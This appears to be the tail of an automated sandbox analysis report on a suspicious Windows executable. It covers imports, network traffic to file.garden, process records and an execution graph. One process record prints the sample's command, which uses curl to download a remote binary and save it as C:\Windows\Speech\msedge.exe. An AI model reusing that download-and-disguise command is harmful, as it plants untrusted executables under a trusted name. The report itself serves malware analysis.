                MSVCP140.dll?get@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAHXZ, ?good@ios_base@std@@QEBA_NXZ, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, _Query_perf_frequency, _Query_perf_counter, ?_Winerror_map@std@@YAHH@Z, ?_Syserror_map@std@@YAPEBDH@Z, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z, ?_Throw_Cpp_error@std@@YAXH@Z, ?uncaught_exceptions@std@@YAHXZ, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?cin@std@@3V?$basic_istream@DU?$char_traits@D@std@@@1@A, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_J@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@I@Z, ?_Xlength_error@std@@YAXPEBD@Z, _Thrd_detach, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ
                D3DCOMPILER_47.dllD3DCompile
                dwmapi.dllDwmExtendFrameIntoClientArea
                IMM32.dllImmGetContext, ImmReleaseContext, ImmSetCandidateWindow, ImmSetCompositionWindow
                VCRUNTIME140_1.dll__CxxFrameHandler4
                VCRUNTIME140.dll__C_specific_handler, _CxxThrowException, __current_exception, __current_exception_context, memset, memmove, memcpy, memcmp, memchr, strstr, __std_terminate, __std_exception_copy, __std_exception_destroy
                api-ms-win-crt-heap-l1-1-0.dllmalloc, _callnewh, free, _set_new_mode
                api-ms-win-crt-runtime-l1-1-0.dll_invalid_parameter_noinfo_noreturn, system, _beginthreadex, terminate, abort, _register_thread_local_exe_atexit_callback, _c_exit, __p___argv, __p___argc, _configure_narrow_argv, _exit, exit, _initterm_e, _initterm, _get_initial_narrow_environment, _set_app_type, _seh_filter_exe, _cexit, _crt_atexit, _register_onexit_function, _initialize_onexit_table, _initialize_narrow_environment
                api-ms-win-crt-utility-l1-1-0.dllqsort, srand, rand
                api-ms-win-crt-time-l1-1-0.dll_time64
                api-ms-win-crt-string-l1-1-0.dllstrncmp, strcmp, strncpy, strcpy_s
                api-ms-win-crt-stdio-l1-1-0.dll__p__commode, _set_fmode, __acrt_iob_func, fflush, fclose, __stdio_common_vsscanf, fread, __stdio_common_vsprintf, _wfopen, fwrite, fseek, __stdio_common_vfprintf, ftell
                api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale, ___lc_codepage_func
                api-ms-win-crt-math-l1-1-0.dllatan2, atanf, acosf, cosf, asin, fmodf, __setusermatherr, powf, ceilf, sinf, sqrtf, tan
                SHELL32.dllShellExecuteW
                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States
                TimestampSource PortDest PortSource IPDest IP
                Sep 30, 2024 18:30:56.175915003 CEST49706443192.168.2.5188.114.96.3
                Sep 30, 2024 18:30:56.175966978 CEST44349706188.114.96.3192.168.2.5
                Sep 30, 2024 18:30:56.176027060 CEST49706443192.168.2.5188.114.96.3
                Sep 30, 2024 18:30:56.186424017 CEST49706443192.168.2.5188.114.96.3
                Sep 30, 2024 18:30:56.186461926 CEST44349706188.114.96.3192.168.2.5
                Sep 30, 2024 18:30:56.771071911 CEST44349706188.114.96.3192.168.2.5
                Sep 30, 2024 18:30:56.771193981 CEST49706443192.168.2.5188.114.96.3
                Sep 30, 2024 18:30:56.774677038 CEST49706443192.168.2.5188.114.96.3
                Sep 30, 2024 18:30:56.774694920 CEST44349706188.114.96.3192.168.2.5
                Sep 30, 2024 18:30:56.774954081 CEST44349706188.114.96.3192.168.2.5
                Sep 30, 2024 18:30:56.778198957 CEST49706443192.168.2.5188.114.96.3
                Sep 30, 2024 18:30:56.823412895 CEST44349706188.114.96.3192.168.2.5
                Sep 30, 2024 18:30:56.897663116 CEST44349706188.114.96.3192.168.2.5
                Sep 30, 2024 18:30:56.897711039 CEST44349706188.114.96.3192.168.2.5
                Sep 30, 2024 18:30:56.897737980 CEST44349706188.114.96.3192.168.2.5
                Sep 30, 2024 18:30:56.897763968 CEST49706443192.168.2.5188.114.96.3
                Sep 30, 2024 18:30:56.897775888 CEST44349706188.114.96.3192.168.2.5
                Sep 30, 2024 18:30:56.897826910 CEST49706443192.168.2.5188.114.96.3
                Sep 30, 2024 18:30:56.897830963 CEST44349706188.114.96.3192.168.2.5
                Sep 30, 2024 18:30:56.897869110 CEST44349706188.114.96.3192.168.2.5
                Sep 30, 2024 18:30:56.897912025 CEST49706443192.168.2.5188.114.96.3
                Sep 30, 2024 18:30:56.904772043 CEST49706443192.168.2.5188.114.96.3
                Sep 30, 2024 18:30:56.904792070 CEST44349706188.114.96.3192.168.2.5
                TimestampSource PortDest PortSource IPDest IP
                Sep 30, 2024 18:30:56.158054113 CEST6310353192.168.2.51.1.1.1
                Sep 30, 2024 18:30:56.169568062 CEST53631031.1.1.1192.168.2.5
                Sep 30, 2024 18:31:41.514843941 CEST5352016162.159.36.2192.168.2.5
                Sep 30, 2024 18:31:41.997232914 CEST53654161.1.1.1192.168.2.5
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Sep 30, 2024 18:30:56.158054113 CEST192.168.2.51.1.1.10x6e70Standard query (0)file.gardenA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Sep 30, 2024 18:30:56.169568062 CEST1.1.1.1192.168.2.50x6e70No error (0)file.garden188.114.96.3A (IP address)IN (0x0001)false
                Sep 30, 2024 18:30:56.169568062 CEST1.1.1.1192.168.2.50x6e70No error (0)file.garden188.114.97.3A (IP address)IN (0x0001)false
                • file.garden
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.549706188.114.96.34434524C:\Windows\System32\curl.exe
                TimestampBytes transferredDirectionData
                2024-09-30 16:30:56 UTC101OUTGET /ZloBYxFY2AfQRNoi/dx3d9.bin HTTP/1.1
                Host: file.garden
                User-Agent: curl/7.83.1
                Accept: */*
                2024-09-30 16:30:56 UTC584INHTTP/1.1 200 OK
                Date: Mon, 30 Sep 2024 16:30:56 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                X-Frame-Options: SAMEORIGIN
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VubYdQPecO9mHVT5rRQqBZxMb6hCRsBqvidNvmOSBU6avSnyca6XMGvEpBGcEHTaFo3DZIuklvjsrQ4Ef%2FAVwQnwZy3lnwdlcNOTcTYF3UclHAdCo3UTu9AGTBcVXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Speculation-Rules: "/cdn-cgi/speculation"
                Server: cloudflare
                CF-RAY: 8cb599b54ac48c3c-EWR
                2024-09-30 16:30:56 UTC785INData Raw: 31 31 34 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                Data Ascii: 1144<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                2024-09-30 16:30:56 UTC1369INData Raw: 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45
                Data Ascii: es-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieE
                2024-09-30 16:30:56 UTC1369INData Raw: 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 4a 35 44 68 2e 72 52 69 53 75 4e 4e 71 4f 39 57 37 57 5f 5a 6f 59 33 4f 6f 55 50 43 73 4c 6d 62 38 6f 73 6f 74 73 73 71 70 31 41 2d 31 37 32 37 37 31 33 38 35 36 2d 30 2e 30 2e 31 2e 31 2d 2f 5a 6c 6f 42 59 78 46 59 32 41 66 51 52 4e 6f 69 2f 64 78 33 64 39 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69
                Data Ascii: ="GET" enctype="text/plain"> <input type="hidden" name="atok" value="J5Dh.rRiSuNNqO9W7W_ZoY3OoUPCsLmb8osotssqp1A-1727713856-0.0.1.1-/ZloBYxFY2AfQRNoi/dx3d9.bin"> <a href="https://www.cloudflare.com/learni
                2024-09-30 16:30:56 UTC905INData Raw: 36 2e 31 32 33 2e 33 33 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f
                Data Ascii: 6.123.33</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-erro
                2024-09-30 16:30:56 UTC5INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:12:30:54
                Start date:30/09/2024
                Path:C:\Users\user\Desktop\4sTTCruY06.exe
                Wow64 process (32bit):false
                Commandline:"C:\Users\user\Desktop\4sTTCruY06.exe"
                Imagebase:0x7ff69dcd0000
                File size:403'456 bytes
                MD5 hash:5A4BBFBB9E1269CBC36A6371D77ACBFC
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:false

                Target ID:1
                Start time:12:30:54
                Start date:30/09/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff6d64d0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                Target ID:2
                Start time:12:30:54
                Start date:30/09/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\msedge.exe
                Imagebase:0x7ff785d60000
                File size:289'792 bytes
                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:3
                Start time:12:30:54
                Start date:30/09/2024
                Path:C:\Windows\System32\curl.exe
                Wow64 process (32bit):false
                Commandline:curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\msedge.exe
                Imagebase:0x7ff797150000
                File size:530'944 bytes
                MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate
                Has exited:true

                Reset < >

                  Execution Graph

                  Execution Coverage:0.5%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:33.8%
                  Total number of Nodes:266
                  Total number of Limit Nodes:2
                  execution_graph 17122 7ff69dcd1230 CreateThread GetSystemMetrics GetSystemMetrics 17123 7ff69dcd12e0 CreateFileA 17122->17123 17125 7ff69dcd1688 17123->17125 17182 7ff69dcd2d80 17125->17182 17127 7ff69dcd1855 CreateToolhelp32Snapshot 17128 7ff69dcd1926 17127->17128 17129 7ff69dcd2b08 17128->17129 17130 7ff69dcd30a0 9 API calls 17128->17130 17210 7ff69dcd30a0 17129->17210 17132 7ff69dcd1ba3 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@I 17130->17132 17134 7ff69dcd3280 9 API calls 17132->17134 17138 7ff69dcd1bb6 17134->17138 17140 7ff69dcd1fe3 17138->17140 17141 7ff69dcd30a0 9 API calls 17140->17141 17142 7ff69dcd1ff3 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K 17141->17142 17143 7ff69dcd3280 9 API calls 17142->17143 17144 7ff69dcd2007 GetModuleHandleA 17143->17144 17145 7ff69dcd202b GetCurrentProcessId 17144->17145 17146 7ff69dcd2997 17144->17146 17147 7ff69dcd2094 17145->17147 17146->17129 17147->17146 17148 7ff69dcd21c8 FreeLibrary 17147->17148 17149 7ff69dcd30a0 9 API calls 17148->17149 17150 7ff69dcd2229 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K 17149->17150 17151 7ff69dcd3280 9 API calls 17150->17151 17153 7ff69dcd223d 17151->17153 17154 7ff69dcd2288 17153->17154 17239 7ff69dcd2fe0 17153->17239 17154->17154 17155 7ff69dcd30a0 9 API calls 17154->17155 17156 7ff69dcd2679 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_J 17155->17156 17157 7ff69dcd3280 9 API calls 17156->17157 17158 7ff69dcd268d 17157->17158 17243 7ff69dd1cf50 17158->17243 17160 7ff69dcd2697 _beginthreadex 17161 7ff69dcd2988 ?_Throw_Cpp_error@std@@YAXH 17160->17161 17162 7ff69dcd26c9 17160->17162 17161->17146 17163 7ff69dcd26d3 _Thrd_detach 17162->17163 17164 7ff69dcd297c ?_Throw_Cpp_error@std@@YAXH 17162->17164 17163->17164 17165 7ff69dcd26ee 17163->17165 17164->17161 17166 7ff69dd1cf50 3 API calls 17165->17166 17167 7ff69dcd2700 _beginthreadex 17166->17167 17168 7ff69dcd2732 17167->17168 17169 7ff69dcd296d ?_Throw_Cpp_error@std@@YAXH 17167->17169 17170 7ff69dcd2961 ?_Throw_Cpp_error@std@@YAXH 17168->17170 17171 7ff69dcd273c _Thrd_detach 17168->17171 17169->17164 17170->17169 17171->17170 17172 7ff69dcd2757 17171->17172 17173 7ff69dd1cf50 3 API calls 17172->17173 17174 7ff69dcd2769 _beginthreadex 17173->17174 17175 7ff69dcd2952 ?_Throw_Cpp_error@std@@YAXH 17174->17175 17176 7ff69dcd279b 17174->17176 17175->17170 17177 7ff69dcd27a5 _Thrd_detach 17176->17177 17178 7ff69dcd2946 ?_Throw_Cpp_error@std@@YAXH 17176->17178 17177->17178 17179 7ff69dcd27c0 17177->17179 17178->17175 17252 7ff69dcd9820 LoadIconW LoadCursorW LoadIconW RegisterClassExA CreateWindowExA 17179->17252 17181 7ff69dcd27c5 17181->17178 17183 7ff69dcd2db0 17182->17183 17183->17183 17184 7ff69dcd2eb4 17183->17184 17185 7ff69dcd2dcd 17183->17185 17280 7ff69dcd11f0 ?_Xlength_error@std@@YAXPEBD 17184->17280 17187 7ff69dcd2dd8 memmove 17185->17187 17190 7ff69dcd2df9 17185->17190 17189 7ff69dcd2ea0 17187->17189 17188 7ff69dcd2eb9 17283 7ff69dcd1150 17188->17283 17189->17127 17190->17188 17191 7ff69dcd2e77 17190->17191 17193 7ff69dcd2e6b 17190->17193 17194 7ff69dcd2e29 17190->17194 17197 7ff69dd1cf50 3 API calls 17191->17197 17196 7ff69dcd2e7f memmove 17193->17196 17198 7ff69dd1cf50 3 API calls 17194->17198 17195 7ff69dcd2ebf 17199 7ff69dcd2eff 17195->17199 17202 7ff69dcd2ef7 17195->17202 17204 7ff69dcd2f18 _invalid_parameter_noinfo_noreturn 17195->17204 17196->17189 17200 7ff69dcd2e36 17197->17200 17201 7ff69dcd2e31 17198->17201 17199->17127 17200->17196 17201->17200 17203 7ff69dcd2e70 _invalid_parameter_noinfo_noreturn 17201->17203 17286 7ff69dd1d1d4 17202->17286 17203->17191 17206 7ff69dcd2f34 _invalid_parameter_noinfo_noreturn ?uncaught_exceptions@std@ 17204->17206 17208 7ff69dcd2f83 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 17206->17208 17209 7ff69dcd2f8d 17206->17209 17208->17209 17209->17127 17213 7ff69dcd30d0 ?good@ios_base@std@ 17210->17213 17212 7ff69dcd3123 17214 7ff69dcd3139 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 17212->17214 17219 7ff69dcd3151 17212->17219 17213->17212 17213->17219 17214->17219 17216 7ff69dcd31ad ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 17220 7ff69dcd31ca 17216->17220 17221 7ff69dcd315b ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exceptions@std@ 17216->17221 17217 7ff69dcd323d ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 17218 7ff69dcd2c86 17217->17218 17224 7ff69dcd3280 17218->17224 17219->17216 17219->17221 17222 7ff69dcd3185 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 17219->17222 17220->17221 17223 7ff69dcd31d5 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 17220->17223 17221->17217 17221->17218 17222->17219 17222->17221 17223->17220 17223->17221 17225 7ff69dcd32c5 ?good@ios_base@std@ 17224->17225 17226 7ff69dcd32be 17224->17226 17227 7ff69dcd32d9 17225->17227 17234 7ff69dcd3307 17225->17234 17226->17225 17229 7ff69dcd32ef ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 17227->17229 17227->17234 17228 7ff69dcd33e2 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exceptions@std@ 17230 7ff69dcd3412 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 17228->17230 17231 7ff69dcd2c8e 17228->17231 17229->17234 17230->17231 17271 7ff69dd1cf30 17231->17271 17232 7ff69dcd3379 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 17233 7ff69dcd3395 17232->17233 17235 7ff69dcd33d2 17233->17235 17238 7ff69dcd33ac ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 17233->17238 17234->17228 17234->17232 17234->17233 17236 7ff69dcd334c ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 17234->17236 17237 7ff69dcd3376 17234->17237 17235->17228 17236->17234 17237->17232 17238->17233 17240 7ff69dcd307e 17239->17240 17241 7ff69dd1cf30 8 API calls 17240->17241 17242 7ff69dcd3095 17241->17242 17242->17153 17244 7ff69dd1cf6a malloc 17243->17244 17245 7ff69dd1cf5b 17244->17245 17246 7ff69dd1cf74 17244->17246 17245->17244 17247 7ff69dd1cf7a 17245->17247 17246->17160 17248 7ff69dd1cf85 17247->17248 17289 7ff69dd1d7b4 17247->17289 17250 7ff69dcd1150 Concurrency::cancel_current_task __std_exception_copy 17248->17250 17251 7ff69dd1cf8b 17250->17251 17251->17160 17253 7ff69dcd9924 7 API calls 17252->17253 17270 7ff69dcd9f12 17252->17270 17257 7ff69dcd9a80 17253->17257 17253->17270 17254 7ff69dd1cf30 8 API calls 17255 7ff69dcda003 17254->17255 17255->17181 17256 7ff69dcd9ae3 malloc 17258 7ff69dcd9b04 17256->17258 17259 7ff69dcd9b0e 17256->17259 17257->17256 17257->17270 17294 7ff69dce1670 17258->17294 17309 7ff69dce5320 17259->17309 17264 7ff69dd06980 37 API calls 17266 7ff69dcd9ec4 17264->17266 17265 7ff69dcd9d04 17265->17264 17265->17265 17337 7ff69dce0710 QueryPerformanceFrequency 17266->17337 17269 7ff69dcd9eff malloc 17269->17270 17270->17254 17272 7ff69dd1cf39 17271->17272 17273 7ff69dd1d35c IsProcessorFeaturePresent 17272->17273 17274 7ff69dcd2c9f 17272->17274 17275 7ff69dd1d374 17273->17275 17434 7ff69dd1d430 RtlCaptureContext 17275->17434 17281 7ff69dcd1221 17280->17281 17282 7ff69dcd121a terminate 17280->17282 17281->17188 17282->17281 17284 7ff69dcd115e Concurrency::cancel_current_task 17283->17284 17285 7ff69dcd116f __std_exception_copy 17284->17285 17285->17195 17287 7ff69dd1d1cc free 17286->17287 17293 7ff69dd1d794 17289->17293 17291 7ff69dd1d7c2 _CxxThrowException 17292 7ff69dd1d82f 17291->17292 17292->17248 17293->17291 17347 7ff69dce2780 17294->17347 17296 7ff69dce16a9 17296->17296 17297 7ff69dce16fd memset 17296->17297 17298 7ff69dce1730 17297->17298 17299 7ff69dce176c cosf 17298->17299 17300 7ff69dce1830 17299->17300 17300->17300 17351 7ff69dce15d0 17300->17351 17303 7ff69dce1de0 malloc 17305 7ff69dce1e13 memset 17303->17305 17306 7ff69dce1e75 17303->17306 17304 7ff69dce1dda 17304->17303 17307 7ff69dce1e78 memset 17305->17307 17306->17307 17307->17259 17310 7ff69dce5387 17309->17310 17357 7ff69dcf8a00 17310->17357 17313 7ff69dcf8a00 3 API calls 17314 7ff69dce5493 malloc 17313->17314 17316 7ff69dce556d 17314->17316 17322 7ff69dce55ac 17314->17322 17364 7ff69dcfa780 17316->17364 17318 7ff69dce569a 17319 7ff69dce56f4 17318->17319 17373 7ff69dcfaa30 17318->17373 17320 7ff69dd1cf30 8 API calls 17319->17320 17324 7ff69dcd9b1f 17320->17324 17322->17318 17323 7ff69dce5647 malloc 17322->17323 17323->17318 17325 7ff69dce5663 memmove 17323->17325 17328 7ff69dd06980 17324->17328 17326 7ff69dce5694 free 17325->17326 17327 7ff69dce5682 17325->17327 17326->17318 17327->17326 17380 7ff69dce3050 17328->17380 17330 7ff69dd06b9e 17331 7ff69dd1cf30 8 API calls 17330->17331 17332 7ff69dd06baa 17331->17332 17332->17265 17334 7ff69dd069cc 17334->17330 17336 7ff69dd06aff 17334->17336 17398 7ff69dce2cd0 17334->17398 17402 7ff69dd066b0 17336->17402 17338 7ff69dce0746 QueryPerformanceCounter 17337->17338 17346 7ff69dce085c 17337->17346 17339 7ff69dce0759 malloc 17338->17339 17338->17346 17344 7ff69dce0790 17339->17344 17341 7ff69dd1cf30 8 API calls 17342 7ff69dcd9ed7 17341->17342 17342->17269 17342->17270 17343 7ff69dce0840 LoadLibraryA 17343->17344 17345 7ff69dce085e GetProcAddress GetProcAddress 17343->17345 17344->17343 17344->17346 17345->17346 17346->17341 17348 7ff69dd1de74 17347->17348 17349 7ff69dce27e6 memset 17348->17349 17350 7ff69dce2951 17349->17350 17350->17296 17350->17350 17352 7ff69dce1625 17351->17352 17353 7ff69dce15ff free 17351->17353 17355 7ff69dce1657 memset 17352->17355 17356 7ff69dce164a free 17352->17356 17353->17352 17355->17303 17355->17304 17356->17355 17358 7ff69dce53fa 17357->17358 17359 7ff69dcf8a2f 17357->17359 17358->17313 17359->17358 17360 7ff69dcf8a62 malloc 17359->17360 17360->17358 17361 7ff69dcf8a82 memmove 17360->17361 17362 7ff69dcf8ab7 free 17361->17362 17363 7ff69dcf8aa5 17361->17363 17362->17358 17363->17362 17365 7ff69dcfa84e 17364->17365 17366 7ff69dcfa79a 17364->17366 17365->17322 17367 7ff69dcfa83c 17366->17367 17368 7ff69dcfa7d5 malloc 17366->17368 17367->17322 17369 7ff69dcfa81e 17368->17369 17370 7ff69dcfa7ee memmove 17368->17370 17369->17322 17371 7ff69dcfa818 free 17370->17371 17372 7ff69dcfa806 17370->17372 17371->17369 17372->17371 17374 7ff69dcfaa45 malloc 17373->17374 17375 7ff69dcfaa9d 17373->17375 17374->17375 17377 7ff69dcfaa71 memmove 17374->17377 17375->17319 17378 7ff69dcfaa85 17377->17378 17379 7ff69dcfaa97 free 17377->17379 17378->17379 17379->17375 17381 7ff69dce3063 17380->17381 17419 7ff69dce2f20 MultiByteToWideChar MultiByteToWideChar 17381->17419 17384 7ff69dce307e 17384->17334 17385 7ff69dce308a ftell 17386 7ff69dce3163 fclose 17385->17386 17387 7ff69dce30a8 fseek 17385->17387 17395 7ff69dce315b 17386->17395 17387->17386 17388 7ff69dce30c1 ftell 17387->17388 17388->17386 17389 7ff69dce30d6 fseek 17388->17389 17389->17386 17390 7ff69dce30e8 17389->17390 17390->17386 17391 7ff69dce3100 malloc 17390->17391 17391->17386 17392 7ff69dce3111 fread 17391->17392 17393 7ff69dce3150 fclose 17392->17393 17394 7ff69dce312d fclose 17392->17394 17393->17395 17396 7ff69dce3145 free 17394->17396 17397 7ff69dce313f 17394->17397 17395->17334 17396->17395 17397->17396 17426 7ff69dce14f0 17398->17426 17400 7ff69dce2cf5 __stdio_common_vsprintf 17401 7ff69dce2d2a 17400->17401 17401->17336 17403 7ff69dd066e4 malloc 17402->17403 17409 7ff69dd0676d 17402->17409 17405 7ff69dd06706 17403->17405 17427 7ff69dcfa6b0 17405->17427 17407 7ff69dd068d2 malloc memmove 17412 7ff69dd068ee 17407->17412 17408 7ff69dd06802 17408->17407 17408->17412 17409->17408 17411 7ff69dd067ac malloc 17409->17411 17410 7ff69dd06932 17415 7ff69dd06953 17410->17415 17418 7ff69dd0694d free 17410->17418 17411->17408 17414 7ff69dd067cb memmove 17411->17414 17412->17410 17413 7ff69dd0692c free 17412->17413 17413->17410 17416 7ff69dd067fc free 17414->17416 17417 7ff69dd067ea 17414->17417 17415->17330 17416->17408 17417->17416 17418->17415 17420 7ff69dce2fbc MultiByteToWideChar MultiByteToWideChar _wfopen 17419->17420 17423 7ff69dce2f8d 17419->17423 17421 7ff69dce3034 17420->17421 17425 7ff69dce3013 free 17420->17425 17421->17384 17421->17385 17422 7ff69dce2fad malloc 17422->17420 17423->17420 17423->17422 17425->17421 17426->17400 17428 7ff69dcfa6d3 17427->17428 17430 7ff69dcfa752 17427->17430 17429 7ff69dcfa709 malloc 17428->17429 17428->17430 17429->17430 